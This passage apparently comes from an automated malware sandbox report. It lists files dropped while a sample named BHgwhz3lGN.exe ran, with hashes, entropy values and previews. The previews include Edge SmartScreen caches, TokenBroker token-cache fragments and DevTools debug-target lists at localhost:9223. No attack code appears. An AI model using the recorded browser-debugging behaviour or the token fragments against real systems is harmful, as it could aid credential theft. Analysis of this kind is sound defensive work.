                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                          MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                          SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                          SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                          SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                          MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                          SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                          SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                          SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):50
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9904355005135823
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXF/XctY5GUf+:0RFeUf+
                                                                                                                                                                                                                                                                                          MD5:E144AFBFB9EE10479AE2A9437D3FC9CA
                                                                                                                                                                                                                                                                                          SHA1:5AAAC173107C688C06944D746394C21535B0514B
                                                                                                                                                                                                                                                                                          SHA-256:EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
                                                                                                                                                                                                                                                                                          SHA-512:837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.01534601806974
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQiWon:YWLSGTt1o9LuLgfGBPAzkVj/T8lQiV
                                                                                                                                                                                                                                                                                          MD5:AD85B02D2939F4C985A9F3BAD4603257
                                                                                                                                                                                                                                                                                          SHA1:C9677FE6B6763F93429BD2D2F13A16B8A5A42F9A
                                                                                                                                                                                                                                                                                          SHA-256:18496802BE742215D3F42F05E6BC8E7032CDD15FF132B5F443FD27F617D575DE
                                                                                                                                                                                                                                                                                          SHA-512:2533FA3692BA0C28B7E8BFCA012ECF56875BB7B73A6A6C08624E95A6B8F54F31211AA52036690C00311D04EB88D43D91A1BBEF682FF8815FD7E1B4B1051B328D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735671332667450}]}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                          MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                          SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                          SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                          SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8554615674249333
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxGuCxl9Il8ucyGX8fSzF/gE9+ipOBwGa2pihQd1rc:m7pYAX86p/r9zOyV2pCH
                                                                                                                                                                                                                                                                                          MD5:5085EB77BD78370775ED9F40D4F8CC66
                                                                                                                                                                                                                                                                                          SHA1:632D1F8E6C28E2C3CDED232EE6FF5A2BD9F9711A
                                                                                                                                                                                                                                                                                          SHA-256:57BE6C5AE26F25FE1DE8FD0E5B26B93BBC7653BCA68C54DAC0B22A77338181F8
                                                                                                                                                                                                                                                                                          SHA-512:829170BD8ECFB70913749E4E93D7ECEEA7CFB65F823DFEAE69C6548A208AAD704AD0858F167F8FA73CD283473386FAE19B78E3AE6EFD4316E03FCFB27E25EC3E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.g.I.Q.t.N.a.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.8.m.8.7.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.996040839855312
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:XMYHYYcvrYS+VXB6hPMONIS7eyXDKXH4uIyK5OJB1F6bAtIc:8SYYczMyPMKIS7DeSoJBDSc
                                                                                                                                                                                                                                                                                          MD5:C4706C345A8FB01C0CAB7A6D5A49FB1D
                                                                                                                                                                                                                                                                                          SHA1:7D30FEFC5079A005A7C2C599BF7ED7AD359B85A6
                                                                                                                                                                                                                                                                                          SHA-256:9CAA9919671BFFD7FB84D5C5A0ED93F3E0E0C36176465CDD5359E457C7723DF2
                                                                                                                                                                                                                                                                                          SHA-512:95534BF4945EFB89AC6DFEB52608DDDE00548FBCD10D937C8F0AC555B25DCCF8FABDAB9A25B10B80BC08E971011C51E5DEDC3B368DFB99EEC09057BB69B2B799
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".9.W.O.r.J.8.t.a.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.8.m.8.7.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.904723889815603
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xoxl9Il8ucqt90vg/1klNDGKi78ASHKuRG0cFclFV4d/vc:aqYnP0vg1kaKx+ITlh
                                                                                                                                                                                                                                                                                          MD5:F6A676104C5F157BF60E67E6FF9A6EDB
                                                                                                                                                                                                                                                                                          SHA1:8F9739F639B6E99CE5ECE0E96CADE43390960C73
                                                                                                                                                                                                                                                                                          SHA-256:E4EB3BFD6267444B18E835D8D072596B4B15DC24EB269695EB3A263F79EA51B7
                                                                                                                                                                                                                                                                                          SHA-512:92BAA29681BDDFCB5EBC9E925E8911AF270D5AD5A47CF641BDF29A07A663C90AB3C80405D1223FE249B5DBF1E59E173B9580A35E1E0E34BE106A7FCAC8C16F56
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".f.t.W.r.V.5.x.5.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.3.t.8.m.8.7.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3919611254093915
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCuHCiNnCmqQbCmzNnC89CvNnC5madgEC5aNnC8CANnCYDCxNnCIwCMNnC1SF5:6NFNzNaNWTNrNPkNRCNaSsh8
                                                                                                                                                                                                                                                                                          MD5:045BCD717133AD308CBD98DFB9AC9F85
                                                                                                                                                                                                                                                                                          SHA1:368BC515C34462E0B5D9DB7AAC4A1FD88EAA640F
                                                                                                                                                                                                                                                                                          SHA-256:C05C81A2BF816CFE154EC26AFA85085F36EF779DD6D7B65834082E2A57C31E1D
                                                                                                                                                                                                                                                                                          SHA-512:5647AAA92F45296304C15CA057B8890665B307676DEFE7BEE38B3DD706F3DF64B1EE2B8A5A6484B06781C1D59E958F3BC912756057B2180151DF34746560103C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FD74C1C37F0E2A2F942842D4D577BA91",.. "id": "FD74C1C37F0E2A2F942842D4D577BA91",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FD74C1C37F0E2A2F942842D4D577BA91"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5D179C18423F09429D2F2219AA9A7818",.. "id": "5D179C18423F09429D2F2219AA9A7818",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5D179C18423F09429D2F2219AA9A7818"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.375515571489277
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoC3bCbMTEC3bIfNaoCsCzfNaoCVCQfNaoCu0UrU0U8Ct:6NnC32QTEC3gNnCsCrNnCVCcNnCu0UrY
                                                                                                                                                                                                                                                                                          MD5:47E8BAAFE5C31AB19953AB82EBED5E84
                                                                                                                                                                                                                                                                                          SHA1:4EAE6366AF079FF0FD066FEB814AA9F6AF4CAE2F
                                                                                                                                                                                                                                                                                          SHA-256:273BD529B79994DAE190DC81FF350B32C368DAF3C9FC4823D435BDFDD9A1EFE1
                                                                                                                                                                                                                                                                                          SHA-512:1075D7508C3EF8535C3954492A5743F7E084678B93CC211322DE502532C9C9790A52FA18CD494C22AFC5B1E8D5FB980FA5D0BDF9C806977DD3964C79D4CEEE58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/5136C953BF9007456EA1D8E16E449813",.. "id": "5136C953BF9007456EA1D8E16E449813",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/5136C953BF9007456EA1D8E16E449813"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/65AC5BAA156D6A0D5D9188DB5C9C06DF",.. "id": "65AC5BAA156D6A0D5D9188DB5C9C06DF",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/65AC5BAA156D6A0D5D9188DB5C9C06DF"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\0d82cc1b-22b2-47a6-93b3-95ca06f1743a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\34da8abc-3191-47b8-9ddc-aba807bc9f9f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\5ceed566-3f6f-499f-8ae2-d3bed52371b2.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):76326
